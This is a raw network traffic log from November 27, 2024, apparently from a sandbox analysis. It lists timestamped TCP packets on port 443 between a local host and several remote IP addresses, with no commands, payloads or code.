                                                  Nov 27, 2024 18:09:34.524501085 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:34.530381918 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:34.585964918 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.586363077 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.590833902 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.590924025 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.596451998 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.596530914 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.603821993 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.603900909 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.609671116 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.609743118 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.615330935 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.615407944 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.622556925 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.622654915 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.628076077 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.628185034 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.633744001 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.633867979 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.639410973 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.639477968 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.645133972 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.645200014 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.655131102 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.656250954 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:34.656250954 CET49711443192.168.2.6184.28.90.27
                                                  Nov 27, 2024 18:09:34.656285048 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:34.656295061 CET44349711184.28.90.27192.168.2.6
                                                  Nov 27, 2024 18:09:34.663208008 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.663276911 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.667428017 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.667490005 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.672045946 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.672122955 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.695919037 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.695991039 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.699687958 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.699776888 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.704466105 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.704528093 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.780378103 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.780466080 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.785676003 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.785715103 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.785742044 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.785757065 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.785793066 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.785794020 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.785828114 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.786341906 CET49710443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.786358118 CET4434971094.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:34.874715090 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:34.919323921 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:35.333129883 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:35.333209038 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:35.333292007 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:35.334073067 CET49709443192.168.2.694.46.167.218
                                                  Nov 27, 2024 18:09:35.334100008 CET4434970994.46.167.218192.168.2.6
                                                  Nov 27, 2024 18:09:35.672844887 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.672904968 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.681092978 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.681109905 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.681615114 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.681619883 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.681940079 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.681960106 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.682337046 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.682342052 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.734003067 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.734401941 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.734421968 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.734882116 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.734888077 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.737596989 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.737956047 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.737965107 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.738339901 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.738343954 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.739114046 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.739352942 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.739370108 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:35.739733934 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:35.739737988 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.147631884 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.147650003 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.147649050 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.147676945 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.147742033 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.147742987 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.147754908 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.147794008 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.147861958 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.147896051 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.148052931 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.148053885 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.148058891 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.148077965 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.148085117 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.148092031 CET49713443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.148097992 CET4434971313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.148250103 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.148297071 CET4434971413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.148339033 CET49714443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.151093960 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.151129961 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.151149035 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.151174068 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.151223898 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.151251078 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.151365042 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.151381016 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.151400089 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.151412964 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.181639910 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.181711912 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.181759119 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.181885958 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.181900978 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.181912899 CET49716443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.181919098 CET4434971613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.183754921 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.183820009 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.183868885 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.183945894 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.183959961 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.183970928 CET49712443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.183975935 CET4434971213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.184614897 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.184650898 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.184716940 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.184873104 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.184885979 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.186254025 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.186269999 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.186331034 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.186453104 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.186465025 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.327054024 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.327080965 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.327142954 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.327163935 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.327219963 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.327456951 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.327481031 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.327493906 CET49715443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.327498913 CET4434971513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.333264112 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.333301067 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:36.333424091 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.333564997 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:36.333573103 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:37.858926058 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:37.858985901 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:37.859051943 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:37.860358000 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:37.860372066 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:38.007556915 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.008143902 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.008171082 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.008649111 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.008655071 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.037316084 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.037776947 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.037805080 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.038227081 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.038238049 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.047439098 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.048008919 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.048042059 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.048461914 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.048474073 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.092634916 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.093211889 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.093300104 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.093689919 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.093704939 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.230227947 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.230897903 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.230945110 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.231373072 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.231388092 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.450108051 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.450193882 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.450316906 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.450473070 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.450501919 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.450515032 CET49719443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.450525999 CET4434971913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.453171968 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.453248978 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.453363895 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.453495979 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.453511000 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.489604950 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.489670038 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.489729881 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.489895105 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.489914894 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.489923954 CET49720443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.489929914 CET4434972013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.492597103 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.492652893 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.492722034 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.492868900 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.492883921 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.501224995 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.501310110 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.501404047 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.501607895 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.501612902 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.501621008 CET49722443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.501625061 CET4434972213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.503957987 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.503992081 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.504061937 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.504195929 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.504211903 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.555418968 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.555494070 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.555550098 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.555793047 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.555821896 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.555840015 CET49721443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.555849075 CET4434972113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.559470892 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.559514046 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.559582949 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.559804916 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.559819937 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.686435938 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.686624050 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.686708927 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.686789036 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.686829090 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.686856031 CET49723443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.686871052 CET4434972313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.690249920 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.690299034 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:38.690357924 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.690867901 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:38.690888882 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:39.637443066 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:39.637623072 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:39.639359951 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:39.639369965 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:39.639671087 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:39.689291000 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:40.261193991 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.262293100 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.262293100 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.262327909 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.262347937 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.324870110 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.325942039 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.325942039 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.325958014 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.325963974 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.325989008 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.326391935 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.326400995 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.326874971 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.326880932 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.418005943 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.419220924 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.419220924 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.419255018 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.419297934 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.525367022 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.526417017 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.526443958 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.526482105 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.526485920 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.653929949 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:40.653990030 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:40.654144049 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:40.709969997 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.710042953 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.710097075 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.710345984 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.710369110 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.710378885 CET49726443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.710382938 CET4434972613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.714320898 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.714389086 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.714549065 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.714751959 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.714764118 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.791510105 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.791589975 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.791686058 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.792426109 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.792490959 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.792546034 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.795588970 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.795613050 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.795625925 CET49727443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.795634031 CET4434972713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.796648979 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.796653032 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.796686888 CET49728443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.796693087 CET4434972813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.801103115 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.801160097 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.801420927 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.801635027 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.801655054 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.801851034 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.801887035 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.802109003 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.802217960 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.802227020 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.879893064 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.879980087 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.880091906 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.880283117 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.880301952 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.880314112 CET49729443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.880319118 CET4434972913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.883407116 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.883451939 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.883529902 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.883686066 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.883699894 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.978635073 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.978703976 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.978827953 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.979012966 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.979033947 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.979054928 CET49730443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.979060888 CET4434973013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.983778954 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.983819008 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:40.983880997 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.984217882 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:40.984230042 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:41.000505924 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:41.047333002 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.589025974 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.589054108 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.589061022 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.589071035 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.589106083 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.589119911 CET49724443192.168.2.620.109.210.53
